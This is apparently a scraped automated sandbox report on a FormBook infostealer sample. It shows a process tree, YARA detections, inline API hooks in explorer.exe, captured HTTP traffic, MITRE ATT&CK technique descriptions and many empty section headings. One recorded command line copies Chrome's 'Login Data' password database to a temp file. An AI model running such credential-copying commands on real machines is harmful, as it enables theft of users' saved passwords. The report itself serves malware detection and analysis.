NCz9wOe-vid7xLgE803ZZJg2YK7SD5YJvCE5G-0quCdhY7ubnFrr8QMr55m1ITNsszDA5dMtu4R9BxvbquoYTmWca83aeR2GvKaRtPoKflzmPU4ysdfnN2o8kyOYdU62Fbj0Lkh_CLYu(qmp8WRNWlledDshHjhgbNfiBsH5lUGKLI7nl65K5fDYU8CiGIUH7WsLCASX9bu04eExxc(NsMZ-Ze5p1JGQVS81Fauafvj1YfMMSMGEAA5BECama0BNVyYmQWZCnCGVO_ofs-QcexKVhv9ywobbnD3tPUBO08rrMZDq33EDDa9cAXeSEwKwI2bAG0CfOlui4xh_WnqRyapMKN7RJJK2Yp4R5QNb~9inr_R2wxu5ieVYtFK1DAwPfk2Dg4nd~5VsOgjjWyLAD01qjItdQArYQbsfAadS9MjxqMPG0q~R2exwbVnn~K6eMpa2btojYqwh(L32oaHIRQr1zZ1U8RbobE9WP5k1okxgCJmIgJDPEiflHtB7Bp4rFbyxRv6oYZMtqHMr0sXjrdJFyGeWqNEzTGaUUicNU6(A1O6TgvA5xkyallY047ettNrdGeYHYtmrtaBGJdVWC8fSDobzkJVv(LpD(H8na3aH~x9P3RMbSfHkVPU38WsF44wLVPAXfFnsjwJoCOu88urlP0D3kEgUYsm3RKX_CyYXAwROpwvGUzurTznMaAs39m90z7WekaCZweawEkj0NlUT7ezRCk(AmFiFKLZUT-PI(BaFmansfJzWJODiRkByktortVDcjAKVgZoty3FMHdLlEVrqvb35VNRtu0G3wV9Hb3OJ55qYVV7t8oO1upWVBGVUMh3n7f11wCQXDs3aBqyYkQJAKSHBLCL0~_zuzMA3QKHNx-(RF86dI4XsUO2oESKZWcdP9IE8TrE2ZiNqKbWs6Y9w1u5_gKm02k6OsMHjNwC5Y1II7Eo3aZt8HidXFumT5K4zCFWRigtK9yCeZQRqlhzB98KlOytMPZ~3h3xG2xLZxYw21j8ms7Iw0ZKaRD6Oj4fFNS3nEX1mKL2aGU82Ki(xQ5h2mwizRMnK1cDnFhxAt0uBVlEZs0ctDueWgRThx2SyA5YljLBcLJP0KfiSifiKGivwi118xya8DM6L02aQmysEIqWhYFTuQ8ZCbkkGFCq6Im7CJO6NVIsej2wOdsxog_yJGJp815x_vots~T(pGM27W9HZJNCVlBYhg8zcM97VPDsO9aYqvLyTseltEbFW5vJoRxYBSe4eSY9rAvUNs3TrXLNHZ4KBty~pAYmLNm0L5IV6n0hUuGQuKd~FhrYw7JNdLfdUzKAIElGNkJ0_OQY42jCVmeI-MXU-mFeDpWNwimEAS47pA0wLxYY8kWJR2yKWyPUzdasoIjEPQhQ87AgP3_xhXalNNsrI4FEEZy7vV9JhEhYwECXvhNSk2bwEwGlzYBbXllKEOQW3gUxxbWNa6t~k9U7l3jT6RSvlOfqXeflHzxgh9V1ivtp9LwlmxIyIEmzIPW91EpkHMJT6pRRACzLWXktgzc5v6F1keDLUW2(5v_rysTnu1z0cMjiUKHkfYBg6PlnVDTsC0CkbK1qA1Vsww909N5ilRiIv80RHeqDAX6ymoeSgDJQFnDJuaRgK6aHuTtuyY2XOCN1AqNUCFtNKTKvQBvFlBW6Gvi73US2I~5XlvFkpBRTMB21tbh4Wi4tH2pLGhqxUf_h6MCKb3RKIKJKUwsw_VxochdIv(aqMF18PBayLI_rn0AVn0Pk4U0F2UndX8oTZIDEr2dY0MypLF_8eEh5r7cru9ZLD0XSFKlz2O3djXojj7cOEyAd5rKN6VFi-IR6V5QTul6XaLL6JVp(ApBtDRPQKvWpvvx4Xz5tCCrBDDXkPbQP1B0GxZbPJA1PLawAuyeNOEZ18LCEuSR1sGdcOff89d52JKa9DM9D4ifC2LGwoG8IJYusA1a7iNfExoe43JalJ8LrNCph5Ar56YQ82~JvDpVyoJQc6(aVl24W-k1mS3kai6sYiyDvWpFoLRd46eJ7IzM4n73z2ZqwVltHmB6AiLKZaEutjoqgBP7~8Nslm62yBW_4-PpXY0EzRnDOeRCXAF65c3QppTkSgQhhEWGpEczbDBkQghNpi5aYyReQSDmTmn1LGRbVf0ilI5X2i2ryO~6xvrjIXKbLir60jgpcw8QTfo1KYLu1nLm32qJ7nZ5xMwXwqvKmVu_ddvlBtNIfiz_(_lui1AHtQdzgHtNObqBiFKV2VJj38i1yIM5m9XzzIzxYMawTo6onEwfNLTWdBTnqE5xAtYAmayyFicjw7nJ66mSyS81pioS2NnZeFKEGMvkSzd-Gmu9o8fZlkWY6WOjVI6kLZV6tA7wGhEkOkF5NRQKnEx4lqAD8WR3z_6-TTH2W-hBd0BWSJyQScxmjFE6aUl83-xmNT15pYPfbSUpig1gbjEGCKiepn2ZuJO-BKcIEMqnE0V8CxRAoU30pVa2zwKwWnNhEOH-ow2mvqRyFWCwN1rv1IhHWYCSeuC8bv7UQ0DChzQ4Mj2fi7pEyL17dYlGDJZzZVWq5K7jIqurzVcLuSBG9JuY1Earwiw9qrGhMVxtlRmBPWAGz0wwdlKdtv~WEiI1QcPHggqNZaW7RRRk6HzQ2-NZ9kdPx-wQyigjF917Dz3h(t7Bh88kKeuk6_wLRptIa43vV7ckeUIM6DB5iiSU9w7FzpayizbK6itxDxz-lyADeNCmzLNQfV3IcmfsocGK0Qdz34SeKmalIQwrKvMLkh2mEIVGIcMaoVzp9D1jeXlQ(vZmVjEbuDxeiXvknDM6a2hV6bZE9oJnN9NkXSoX9NICr2Vf9D1lpVFQWvZvTvMfepnNiRrvs_Y282kLpE4gXPeZnFvyQpHzmZHuJYAP3_R3O_N04DS4rchXTivdWdhE5C4h(s6S7UU1i4k_FVoUzkTwc3c2(ACdh4vp58sFs_md7LpbhjhAk4GBXTKOHUQDVW6Zh_VGUp6uwheh3E5so72V1yc8zm53W39C5GsYE9S4nlpSb9sHRNmlZDBaq1V5jvBLK2SNV7s13UEFoXwU61CAvnpnPGdfRa0pA2kGOCyczYnGeO7STb20DeXneVC4TGTlpH(-3OGI120D4P5XLq6lUgy8DUkKdF3LBTEXXuDszGxgzxqCG9PvBZMiPMbK7lhkcArd3MDN8hlOCG6IJwSOnpByHJq9ONfJHrc4rWsg
May 12, 2021 23:55:58.349483013 CEST	4771	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.ordertds.com/vns/ Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 12 May 2021 21:55:58 GMT Connection: close Content-Length: 152 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 72 64 65 72 74 64 73 2e 63 6f 6d 2f 76 6e 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.ordertds.com/vns/">here</a></body>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE8
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE8
GetMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE8
GetMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE8

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: focus.exe PID: 3176 Parent PID: 5600

General

Start time:	23:53:59
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\focus.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\focus.exe'
Imagebase:	0x400000
File size:	2844959 bytes
MD5 hash:	5E5CC661BEB832B718DF6B68D16C0165
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: player-toolkit.exe PID: 2588 Parent PID: 3176

General

Start time:	23:54:00
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Imagebase:	0x10000
File size:	1970176 bytes
MD5 hash:	1844A4E542EEAC121065EA23B0F1D6B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, Metadefender, Browse Detection: 69%, ReversingLabs
Reputation:	low

Analysis Process: explorer.exe PID: 3388 Parent PID: 2588

General

Start time:	23:55:02
Start date:	12/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: autochk.exe PID: 2428 Parent PID: 3388

General

Start time:	23:55:12
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\autochk.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autochk.exe
Imagebase:	0x1250000
File size:	871424 bytes
MD5 hash:	34236DB574405291498BCD13D20C42EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: wscript.exe PID: 1956 Parent PID: 3388

General

Start time:	23:55:13
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0xa30000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 404 Parent PID: 1956

General

Start time:	23:55:27
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Imagebase:	0xdd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5640 Parent PID: 404

General

Start time:	23:55:27
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: player-toolkit.exe PID: 5216 Parent PID: 3388

General

Start time:	23:55:39
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Imagebase:	0x10000
File size:	1970176 bytes
MD5 hash:	1844A4E542EEAC121065EA23B0F1D6B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: player-toolkit.exe PID: 5452 Parent PID: 3388

General

Start time:	23:55:47
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Imagebase:	0x10000
File size:	1970176 bytes
MD5 hash:	1844A4E542EEAC121065EA23B0F1D6B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report focus.com

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre